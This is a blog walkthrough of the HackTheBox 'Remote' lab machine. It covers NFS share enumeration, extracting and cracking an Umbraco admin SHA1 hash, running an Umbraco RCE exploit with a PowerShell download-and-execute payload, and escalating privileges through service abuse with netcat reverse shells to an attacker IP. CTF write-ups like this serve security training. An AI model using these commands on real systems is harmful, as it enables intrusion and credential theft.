[ Remote ] - HACKTHEBOX

By -



hello guys today i will show you how to hack remote machine. As usual we need some information about the services so we need to enumerate the box.
Tool name: nmap
nmap is used for information gathering.

# Nmap 7.80 scan initiated Sat jul 18 10:21:24 2020 as: nmap -A -sV -sC -oN remote.nmap remote.htb
Nmap scan report for remote.htb (10.10.10.180)
Host is up (0.21s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE       VERSION
21/tcp   open  ftp           Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|_  SYST: Windows_NT
80/tcp   open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Home - Acme Widgets
111/tcp  open  rpcbind       2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/tcp6  rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  2,3,4        111/udp6  rpcbind
|   100003  2,3         2049/udp   nfs
|   100003  2,3         2049/udp6  nfs
|   100003  2,3,4       2049/tcp   nfs
|   100003  2,3,4       2049/tcp6  nfs
|   100005  1,2,3       2049/tcp   mountd
|   100005  1,2,3       2049/tcp6  mountd
|   100005  1,2,3       2049/udp   mountd
|   100005  1,2,3       2049/udp6  mountd
|   100021  1,2,3,4     2049/tcp   nlockmgr
|   100021  1,2,3,4     2049/tcp6  nlockmgr
|   100021  1,2,3,4     2049/udp   nlockmgr
|   100021  1,2,3,4     2049/udp6  nlockmgr
|   100024  1           2049/tcp   status
|   100024  1           2049/tcp6  status
|   100024  1           2049/udp   status
|_  100024  1           2049/udp6  status
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
2049/tcp open  mountd        1-3 (RPC #100005)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=3/28%OT=21%CT=1%CU=41603%PV=Y%DS=2%DC=T%G=Y%TM=5E7F259
OS:2%P=x86_64-unknown-linux-gnu)SEQ(SP=108%GCD=1%ISR=10D%CI=I%TS=U)SEQ(SP=1
OS:08%GCD=1%ISR=10D%TS=U)SEQ(SP=108%GCD=1%ISR=10D%CI=I%II=I%TS=U)OPS(O1=M54
OS:DNW8NNS%O2=M54DNW8NNS%O3=M54DNW8%O4=M54DNW8NNS%O5=M54DNW8NNS%O6=M54DNNS)
OS:WIN(W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FF70)ECN(R=Y%DF=Y%T=80%W=
OS:FFFF%O=M54DNW8NNS%CC=Y%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R=Y%
OS:DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T=80%W=0%S=Z%A=O%F=AR%
OS:O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=80%
OS:W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=
OS:)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=80%IPL=164%
OS:UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=80%CD=Z)

Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 4m08s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-03-28T10:27:01
|_  start_date: N/A

TRACEROUTE (using port 995/tcp)
HOP RTT       ADDRESS
1   225.12 ms 10.10.14.1
2   225.38 ms remote.htb (10.10.10.180)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat jul 18 10:23:14 2020 -- 1 IP address (1 host up) scanned in 109.92 seconds

After scanning i paid attention to rpcbind service, then i tried nmap script to get more things from that rpcbind.

# Nmap 7.80 scan initiated Sat jul 18 12:48:06 2020 as: nmap -sV --script=nfs-showmount -oN remote.nfs remote.htb 

Nmap scan report for remote.htb (10.10.10.180)
Host is up (0.29s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE       VERSION
21/tcp   open  ftp           Microsoft ftpd
80/tcp   open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
111/tcp  open  rpcbind?
| nfs-showmount: 
|_  /site_backups 
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
2049/tcp open  mountd        1-3 (RPC #100005)
| nfs-showmount: 
|_  /site_backups 
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat jul 18 12:50:06 2020 -- 1 IP address (1 host up) scanned in 119.88 seconds

At this time, we cannot see nfs disk named sites_backups, now we can mount it using this commands open a new terminal window and type

$ sudo mount -o nfsvers=4 -t nfs remote.htb:/site_backups /mnt


It took some time to enum all file in the disk, then i saw a SDF file named Umbraco.sdf, we can try to see content from this file its to see just type strings command, and leave it aside. Just a bit enum we could find a CMS that is Umbraco and we need credentials to login in it. I thought the credentials was inside Umbraco.sdf to get the credentials type command in terminal.

strings Umbraco.sdf | grep admin

We found the strings. strings look like a 

adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa
{"hashAlgorithm":"SHA1"}admin@htb.localen-USfeb1a998-d3bf-406a-b30b-e269d7abdf50


We may all knew that b8be16afba8c314ad33d812f22a04991b90e2aaa is a hash and the type is sha1, now decrypt this hash and we get password like baconandcheese.Now finally we have a credentials like username: admin@htb.local and password: baconandcheese. After spending some time on this machine finally i found a cve for the Umbraco.sdf. Spending some time on cve so i am going to setup a MSF console to get comfortable shell.

First create simple PS shell named mini-reverse.ps1 

$ wget https://raw.githubusercontent.com/noraj/Umbraco-RCE/master/exploit.py -O umbraco_cve.py
$ chmod 775 umbraco_cve.py
$ msfconsole
> use exploit/multi/handler
	> set payload payload/windows/x64/shell_reverse_tcp
	> set LHOST 10.10.15.84
	> set ExitOnSession false
	> exploit -j
$ ./umbraco_cve.py -u admin@htb.local -p baconandcheese -i 'http://remote.htb' -c powershell.exe -a "IEX (New-Object Net.WebClient).DownloadString('http://10.10.15.84/mini-reverse.ps1')"
$ ./umbraco_cve.py -u admin@htb.local -p baconandcheese -i 'http://remote.htb' -c powershell.exe -a "IEX (New-Object Net.WebClient).DownloadString('http://10.10.15.84/mini-reverse.ps1')"


PS C:\users\Public> type user.txt
3a48d481500c0336xxxxxxx4e5224

Now we are going to root the box by simply enumerate with some common powershell exploits and i got something interesting from github named PowerUp.ps1.

Step by Step like changing the path we can able to get the shell

PS C:\users\Public> invoke-webrequest -Uri http://10.10.15.84/PowerUp.ps1 -OutFile powerup.ps1
PS C:\users\Public> invoke-webrequest -Uri http://10.10.15.84/nc64.exe -OutFile c:\temp\nc64.exe
PS C:\users\Public> Invoke-ServiceAbuse -Name 'UsoSvc' -Command "c:\temp\nc64.exe -e cmd.exe 10.10.15.84 2222"
PS C:\users\Public> c:\temp\nc64.exe -e cmd.exe 10.10.15.84 1111
PS C:\users\Public> C:\Windows\system32>type c:\users\administrator\desktop\root.txt
	type c:\users\administrator\desktop\root.txt
	b3dc833759xxxxxxxxxxxx051f05

We have another way to get into the root by exploiting the team-viewer.

Thanks for reading.

Hello World!! I am Mayank Srivastava and i am graduated in computer application from Veer Bahadur Singh Purvanchal University. And I post tutorials on programming languages. I'd like to share some of my knowledge with everyone. And also i am interested in Cyber Security Penetration Testing.

Comments

Post a Comment

Popular posts from this blog

[ Blue ] - TRYHACKME

By -
Image
Hello guys Today i am going to do walkthrough on the machine called Blue. This is very easy box based on the vulnerability of EternalBlue( CVE-2017-0143 ). As usual first thing we are going to do is scanning the network using the nmap tool to see which ports are open and which services are running on this machine. The flags used in the nmap scan are: -sS - for a syn scan -sV -for a service version scan -O - to identify the OS used -T4 - the speed of scan -open - to show only the open ports We notice the service running on the port 445 is SMB so we can use nmap script engine to verify this service is vulnerable or not for EternalBlue vulnerability. The flags used are: -p - to test only the port provided(in this case 445) --script=smb-vuln-ms17-010 - the nmap script to run against our target The output of the scan is shown us to machine is vulnerable. Metasploit already has this exploit, so let's fire it up to gain access. To start the metasploit console just run the command msfco...
Read more

[ The Cod Caper ] - TRYHACKME

By -
Image
    Check out the room https://tryhackme.com/room/thecodcaper Hello everyone  this is another walkthrough blog of tryhackme, this room contains some trick to crack the linux machines root password. Room name : The Cod Caper Machine Type : Linux Task 2  We'll run nmap on the target # nmap -sV -A -p1-1000 -T4 -oN initial <target-machine-ip> Task 3 As recommended in tryhackme the cod caper room we'll use  gobuster  for the directory checking the wordlist for  gobuster  is in the task for downloading. Don't forget to user  -x  flag for specific extension search like ". html, .txt, .php " # gobuster dir -u <target_url> -w "path/of/wordlist" -x ".php" -x flag is important because we have to check the specific extension like ".html, .php" After gobuster directory bruteforcing we have admin page for login but we don't have username and password for login so we have to find the username and password to access the page. Task 4 W...
Read more

[ Basics Penetration Testing ] - TRYHACKME

By -
Image
[ Basics Penetration Testing ] - TRYHACKME.COM   This article is for basics penetration testing  1. Deploy the machine and connect to the tryhackme network. 2. Find the service exposed by the machine. For finding the service here we can use nmap  nmap -sC -sV -oN initial <machine_ip> # Nmap 7.80 scan initiated Sun Sep 27 11:26:39 2020 as: nmap -sC -sV -oN initial 10.10.38.194 Nmap scan report for 10.10 .38.196 Host is up ( 0 .077s latency ) . Not shown: 997 closed ports PORT STATE SERVICE VERSION 22 /tcp open ssh OpenSSH 7 .2p2 Ubuntu 4ubuntu2.4 ( Ubuntu Linux ; protocol 2.0 ) | ssh-hostkey: | 2048 db:45:cb:be:4a:8b:71:f8:e9:31:42:ae:ff:f8:45:e4 ( RSA ) | 256 09:b9:b9:1c:e0:bf:0e:1c:6f:7f:fe:8e:5f:20:1b:ce ( ECDSA ) | _ 256 a5:68:2b:22:5f:98:4a:62:21:3d:a2:e2:c5:a9:f7:c2 ( ED25519 ) 139 /tcp open netbios-ssn Samba smbd 3 .X - 4 .X ( workgroup: WORKGROUP ) 445 /tcp open netbios-ssn Samba smbd 4.3 .11-Ubuntu ( workgroup: WORKGROUP ...
Read more